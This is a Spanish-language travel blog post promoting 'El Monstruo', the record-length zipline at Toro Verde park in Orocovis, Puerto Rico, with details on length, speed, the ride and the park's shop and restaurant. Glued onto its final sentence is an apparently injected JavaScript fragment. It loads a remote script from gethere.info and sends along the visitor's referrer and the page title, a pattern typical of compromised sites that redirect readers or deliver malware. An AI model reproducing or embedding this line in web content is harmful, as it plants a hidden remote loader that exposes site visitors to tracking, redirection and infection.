La tirolina más larga del mundo está en Puerto Rico y mide… ¡2,5 kilómetros!

14/04/2016

Zipline-Tirolina-Toro-Verde-Puerto-Rico-Caribe

Lista de planes para tu  viaje a Puerto Rico:

· Tomar el sol en sus playas paradisíacas: ✔
· Empaparte de su historia y su arquitectura colonial: ✔
· Mover las caderas a ritmo de salsa: ✔
· Tirarte por el zipline más largo del mundo… ¡Sí! ¡Será inolvidable! ✔

Y es que la isla caribeña se sigue reinventando para que tus vacaciones se conviertan en una experiencia que nunca borrarás de tu memoria. Más allá del turismo de sol y playa, su gran seña de identidad, Puerto Rico está haciendo méritos más que suficientes para erigirse como el nuevo destino predilecto para los amantes de los deportes de aventura: kitesurf, buceo, body rafting, vuelos en parapente y, por supuesto, también la mayor tirolina del planeta. ¿Estás preparado para una emocionante descarga de adrenalina?

Durante los últimos años, el ecoturismo en Puerto Rico está despegando con fuerza para ofrecer nuevas e interesantes alternativas a los visitantes, opciones que permiten zambullirse de lleno en la naturaleza y descubrir de primera mano la cara menos conocida de sus atractivos paisajes. Dentro de estas propuestas, Toro Verde juega un papel fundamental: se trata de un enorme parque ecoturístico ubicado en el municipio de Orocovis, en pleno corazón de la isla, a sólo una hora y media de San Juan. Es un precioso enclave en el que naturaleza y diversión se unen para hacer las delicias de los aventureros, un lugar donde te dejarás llevar por sensaciones que nunca antes habías sabido apreciar; acabarás disfrutando a lo grande.

Cuenta con diversas tirolinas repartidas por el parque, pero, sin duda, el plato fuerte de Toro Verde es ‘El Monstruo’, una denominación que no ha recibido por casualidad: hablamos del zipline más largo del mundo, un cable de 2.530 metros de longitud elevado a más de trescientos metros de altura. Guinness World Records así lo ha certificado. Para que puedas hacerte una idea de su extensión, la distancia que recorrerás suspendido en el aire equivaldría a… ¡28 campos de fútbol! Y eso no es todo, porque, presta atención, durante el descenso llegarás a alcanzar una velocidad de 150 km/h. Suena emocionante, ¿verdad?

La magia comienza cuando te colocas el equipo de vuelo y cruzas con decisión el puente colgante que te guiará hasta la plataforma de lanzamiento; en ese momento te enfrentarás al más absoluto de los silencios y sentirás incluso cómo el tiempo se detiene, empujándote hacia la aventura más maravillosa. Irás equipado con un sistema de radio para que, en la bajada, tengas la oportunidad de comunicarte con tus acompañantes y hacerles también partícipes de la experiencia. Durante los minutos que dura el descenso te sentirás la persona más afortunada del universo, deleitándote con unos paisajes de excepción contemplados desde una perspectiva de lo más sugerente, y al finalizar el descenso recibirás un certificado de vuelo con tu nombre, la chaqueta exclusiva de ‘El Monstruo’, a la que se añadirá un parche con el número de tu vuelo, y una fotografía para que te conviertas en la envidia de tu reunión de amigos.

Toro Verde, además, ha sabido desarrollar dentro del recinto un completo paquete turístico, albergando una coqueta tienda de souvenirs para que puedas llevarte un recuerdo de tu paso por el parque y un excelente restaurante en el que disfrutarás de sabrosas recetas de la gastronomía portorriqueña aderezadas con un toque sofisticado, gracias al buen gusto del chef Carlos Ortiz.

¿Qué más necesitas para disfrutar de esta emocionante hazaña? ¿Te atreves? ;)s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;